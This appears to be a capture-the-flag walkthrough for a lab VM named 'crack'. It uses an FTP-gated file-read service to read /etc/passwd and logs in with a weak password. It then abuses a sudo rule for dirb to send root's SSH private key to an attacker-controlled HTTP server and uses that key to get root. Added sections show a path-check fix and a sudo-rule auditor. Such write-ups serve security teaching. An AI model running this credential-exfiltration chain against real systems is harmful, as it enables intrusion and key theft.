Difficulty: easy

Kali: 192.168.56.104

Target: 192.168.56.165

Port scan

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.165 -sV -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 21:24 CST
Nmap scan report for 192.168.56.165
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.105
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Apr 26 15:55 upload [NSE: writeable]
4200/tcp  open  ssl/http ShellInABox
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after:  2043-06-02T10:20:13
|_http-title: Shell In A Box
12359/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     File to read:NOFile to read:
|   NULL: 
|_    File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.94SVN%I=7%D=4/27%Time=662CFCAC%P=x86_64-pc-linux-gnu%
SF:r(NULL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:N
SF:OFile\x20to\x20read:");
MAC Address: 08:00:27:0E:BE:24 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.56.165

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.42 seconds

Three ports are open: 21, 4200 and 12359. Start with an anonymous FTP login.

Anonymous FTP login

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.165
Connected to 192.168.56.165.
220 (vsFTPd 3.0.3)
Name (192.168.56.165:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||10771|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 07  2023 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 upload
226 Directory send OK.

There is an upload directory.

ftp> cd upload
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||12802|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py
226 Directory send OK.

Download the .py file with get and take a look:

import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = "NO"
while True:
        try:
                c.send('File to read:'.encode())
                data = c.recv(1024)
                file = (str(data, 'utf-8').strip())
                filename = os.path.basename(file)
                check = "/srv/ftp/upload/"+filename
                if os.path.isfile(check) and os.path.isfile(file):
                        f = open(file,"r")
                        lines = f.readlines()
                        lines = str(lines)
                        lines = lines.encode()
                        c.send(lines)
                else:
                        c.send(no.encode())
        except ConnectionResetError:
                pass

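The service on port 12359 reads files, but only when a file with the same name exists on the FTP server: the script checks os.path.basename of the requested path against /srv/ftp/upload/ and then opens the full path as supplied.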

┌──(root㉿kali2)-[~/Desktop]
└─# nc 192.168.56.165 12359       
File to read:crack.py
['import os\n', 'import socket\n', 's = socket.socket()\n', 's.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n', 'port = 12359\n', "s.bind(('', port))\n", 's.listen(50)\n', '\n', 'c, addr = s.accept()\n', 'no = "NO"\n', 'while True:\n', '        try:\n', "                c.send('File to read:'.encode())\n", '                data = c.recv(1024)\n', "                file = (str(data, 'utf-8').strip())\n", '                filename = os.path.basename(file)\n', '                check = "/srv/ftp/upload/"+filename\n', '                if os.path.isfile(check) and os.path.isfile(file):\n', '                        f = open(file,"r")\n', '                        lines = f.readlines()\n', '                        lines = str(lines)\n', '                        lines = lines.encode()\n', '                        c.send(lines)\n', '                else:\n', '                        c.send(no.encode())\n', '        except ConnectionResetError:\n', '                pass\n']File to read:

It does read the file. To read /etc/passwd, first upload a file named passwd over FTP.

ftp> ls -al
229 Entering Extended Passive Mode (|||49777|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py
-rw-------    1 107      114             0 Apr 26 15:55 passwd
226 Directory send OK.

┌──(root㉿kali2)-[~/Desktop]
└─# nc 192.168.56.165 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']File to read:
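Why the decoy upload works, as an added example that is not part of the original write-up or the target's code: `vulnerable_check` reproduces crack.py's test, and `hardened_resolve` is one possible fix. The function names and the temporary directories standing in for /srv/ftp/upload and /etc are assumptions.

```python
import os
import tempfile

def vulnerable_check(requested, upload_dir):
    """crack.py's logic: validate the basename, then trust the full path."""
    check = os.path.join(upload_dir, os.path.basename(requested))
    return os.path.isfile(check) and os.path.isfile(requested)

def hardened_resolve(requested, upload_dir):
    """Return the real path to open, or None if it is outside upload_dir."""
    base = os.path.realpath(upload_dir)
    # Resolve "..", absolute paths and symlinks first, then compare.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None

def demo():
    with tempfile.TemporaryDirectory() as root:
        upload = os.path.join(root, "upload")   # stands in for /srv/ftp/upload
        etc = os.path.join(root, "etc")         # stands in for /etc
        os.mkdir(upload)
        os.mkdir(etc)
        secret = os.path.join(etc, "passwd")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed content
        # The empty decoy with a matching basename, as uploaded over FTP.
        open(os.path.join(upload, "passwd"), "w").close()
        # A symlink inside the upload directory that points outside it.
        os.symlink(secret, os.path.join(upload, "link"))
        inside = os.path.realpath(os.path.join(upload, "passwd"))
        return {
            "vulnerable_outside": vulnerable_check(secret, upload),
            "hardened_outside": hardened_resolve(secret, upload),
            "hardened_traversal": hardened_resolve("../etc/passwd", upload),
            "hardened_symlink": hardened_resolve("link", upload),
            "hardened_inside_ok": hardened_resolve("passwd", upload) == inside,
        }

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The hardened version compares the resolved path against the resolved base directory, so an absolute path, a `..` sequence and a symlink are all rejected while a plain file name inside the directory is still served.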

Getting a shell

Note that the cris user's shell is /bin/bash. Open port 4200 and log in with cris/cris.

Privilege escalation to root

sudo

cris@crack:~$ sudo -l
Matching Defaults entries for cris on crack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cris may run the following commands on crack:
    (ALL) NOPASSWD: /usr/bin/dirb

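dirb is a directory-scanning tool. Start an HTTP server on the Kali machine, then pass root's SSH private key file as dirb's wordlist; each line of the key is requested as a URL path and so leaks into the server log.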

cris@crack:~$ sudo /usr/bin/dirb  http://192.168.56.104:6677 /root/.ssh/id_rsa

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr 27 15:58:53 2024
URL_BASE: http://192.168.56.104:6677/
WORDLIST_FILES: /root/.ssh/id_rsa

-----------------

GENERATED WORDS: 38                                                            

---- Scanning URL: http://192.168.56.104:6677/ ----
                                                                                                                                                                                                           
-----------------
END_TIME: Sat Apr 27 15:58:53 2024
DOWNLOADED: 38 - FOUND: 0

┌──(root㉿kali2)-[~/Desktop]
└─# python -m http.server 6677
Serving HTTP on 0.0.0.0 port 6677 (http://0.0.0.0:6677/) ...
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /frand2 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /-----BEGIN HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /-----END HTTP/1.1" 404 -

root's private key has leaked into the server log. Reassemble it into a key file.

Transfer it to the target and log in:

cris@crack:~$ wget http://192.168.56.104:6677/ssh.txt
--2024-04-27 16:02:35--  http://192.168.56.104:6677/ssh.txt
Conectando con 192.168.56.104:6677... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2592 (2,5K) [text/plain]
Grabando a: «ssh.txt»

ssh.txt                                            100%[================================================================================================================>]   2,53K  --.-KB/s    en 0s      

2024-04-27 16:02:35 (444 MB/s) - «ssh.txt» guardado [2592/2592]

cris@crack:~$ chmod 600 ssh.txt
cris@crack:~$ ssh -i ssh.txt root@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:7z5F9pr6GN7gcEMbKUwipxWswKEpR9bMKOVzGc0V7/s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun  7 22:11:49 2023
root@crack:~# id
uid=0(root) gid=0(root) grupos=0(root)

Root access obtained.
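The escalation above rests on a sudoers rule that lets cris run dirb as root with any arguments, so root reads whichever wordlist path the user names. An audit for that rule shape over `sudo -l` output, added here and not part of the original write-up; the function name and every sample rule except the dirb line are constructed.

```python
import re

# "(runas) [TAG: ...] command[, command ...]" as printed by `sudo -l`.
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$"
)

def audit_sudo_l(text):
    """Return (command, severity, reason) for root rules with unpinned arguments."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults entries, headers, blank lines
        runas_user = m["runas"].split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        severity = "high" if "NOPASSWD:" in m["tags"] else "medium"
        # Commands are comma-separated; "\," is a literal comma in arguments.
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            path, _, args = cmd.partition(" ")
            args = args.strip()
            if args == "":
                reason = "no argument list: any arguments are accepted"
            elif "*" in args:
                reason = "wildcard in arguments also matches '/' and spaces"
            else:
                continue  # arguments pinned exactly ('""' means none allowed)
            findings.append((path, severity, reason))
    return findings

# First rule is the one from this page; the rest are constructed for contrast.
SAMPLE = """\
User cris may run the following commands on crack:
    (ALL) NOPASSWD: /usr/bin/dirb
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) NOPASSWD: /usr/bin/tail -n 50 /var/log/app.log, /usr/bin/less
    (root) /usr/bin/cat /var/log/*
    (www-data) NOPASSWD: /usr/bin/php
"""

if __name__ == "__main__":
    for path, severity, reason in audit_sudo_l(SAMPLE):
        print(f"{severity:6} {path}: {reason}")
```

A rule flagged this way still needs a human decision: either remove it or pin the full argument list, since any root-run tool that opens a user-named file is a file-read primitive.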